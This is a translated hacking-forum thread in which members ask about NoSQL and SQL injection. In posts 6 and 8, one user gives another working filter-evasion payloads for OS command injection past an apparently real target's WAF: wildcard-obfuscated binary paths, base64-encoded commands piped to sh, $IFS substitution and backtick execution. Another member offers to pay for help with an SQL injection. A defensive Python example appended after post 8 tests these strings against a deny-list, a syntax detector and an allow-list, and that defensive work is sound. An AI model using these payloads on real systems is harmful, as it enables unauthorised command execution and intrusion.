Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. Gorbachev

    Gorbachev Member

    Well, actually, that is about system commands, not PHP RCE )
     
  2. Octavian

    Octavian Member

    What should I use to look for NoSQL injection? Can the Burp scanner do it? Are there extensions for it?
     
  3. kacergei

    kacergei Member

    Can anyone advise on this question?
    PS: In which section can I post a request along the lines of "help with an SQL injection"? I'll chip in for a beer(
    I haven't seen threads like that in the services section(
     
  4. hibar1Xs

    hibar1Xs Member

    • Fragmented SQL injections
    • HTTP Parameter Pollution
    https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf
    https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сложные_случаи.pdf
     
    kacergei and BillyBons like this.
  5. man474019

    man474019 Member

    Hi all,
    OS command injection in POST data, mod_sec WAF. When I try echo test, it works,
    but when I try uname, ls, pwd, dir, the WAF deletes the command. Any real advice?
     
  6. crlf

    crlf Members of Antichat

    Hi, try this:
    Code:
    /b?n/?s /
    /b?n/un?m?
    /?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
    
     
    dmax0fw likes this.
  7. man474019

    man474019 Member

    @crlf thank you for the reply. I tried these variants for reading /etc/passwd, and now I have also tried your variants, but the WAF cuts the functions as well (((

    request
    response
     
  8. crlf

    crlf Members of Antichat

    It seems that there is some unknown logic on the backend, not a traditional WAF. Try to fuzz and detect the white/black sequences and construct the attack vector in accordance with the circumstances. For example:

    Code:
    ;id;
    `id`
    ;sleep 100;
    `sleep 100`
    uname${IFS}-a
    echo$IFS"bHMgLWxh"|base64$IFS-d|sh
    `echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
    
    and so on...
    
    Also check this.
     
    man474019 and dmax0fw like this.
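
The strings posted in this thread also show defenders why filtering on command names is the wrong control. The following is an added example, not code from any poster or from the target application: it runs a few of the thread's strings through a hypothetical name-based deny-list, a shell-syntax detector, and an allow-list for an assumed field type (a DNS hostname). The regex names, the `triage` helper and the hostname assumption are all illustrative.

```python
import re

# Deny-list of command names, modelled on the behaviour reported in the thread
# (hypothetical: the real backend logic is unknown).
DENY = re.compile(r"\b(?:uname|ls|pwd|dir|id|sleep|base64|sh)\b")

# Shell syntax that has no place in a plain data field. The glob rule would
# also fire on URLs with query strings, so scope it to fields that never hold URLs.
INDICATORS = {
    "separator": re.compile(r"[;|&\n]"),
    "substitution": re.compile(r"`|\$\("),
    "ifs-expansion": re.compile(r"\$\{?IFS\b"),
    "glob-in-path": re.compile(r"/[^\s/]*[?*\[][^\s/]*"),
}

# Allow-list for the assumed field type: a DNS hostname.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"(?=.{{1,253}}\Z)(?:{LABEL}\.)*{LABEL}\Z")

def denylist_passes(value):
    """True if the name-based deny-list finds nothing to remove."""
    return DENY.search(value) is None

def shell_indicators(value):
    """Names of the shell-syntax rules that match the value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def allowlist_accepts(value):
    """True only if the whole value is a syntactically valid hostname."""
    return HOSTNAME.match(value) is not None

# Constructed sample set: one benign value plus strings quoted in the thread.
SAMPLES = ["example.com", "/b?n/un?m?", "uname${IFS}-a", "`id`", ";sleep 100;"]

def triage(samples=SAMPLES):
    """Map each sample to (denylist_passes, indicators, allowlist_accepts)."""
    return {s: (denylist_passes(s), shell_indicators(s), allowlist_accepts(s))
            for s in samples}

if __name__ == "__main__":
    for s, (deny_ok, hits, allowed) in triage().items():
        print(f"{s!r:18} denylist_passes={deny_ok} indicators={hits} allowlist={allowed}")
```

The glob form passes the deny-list untouched, while the allow-list rejects every non-hostname value without needing to know any command names. The durable fix is to validate against the expected format and pass the value as an argument vector instead of through a shell.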
  9. BabaDook

    BabaDook Level 8

    And what did you expect from your command?
     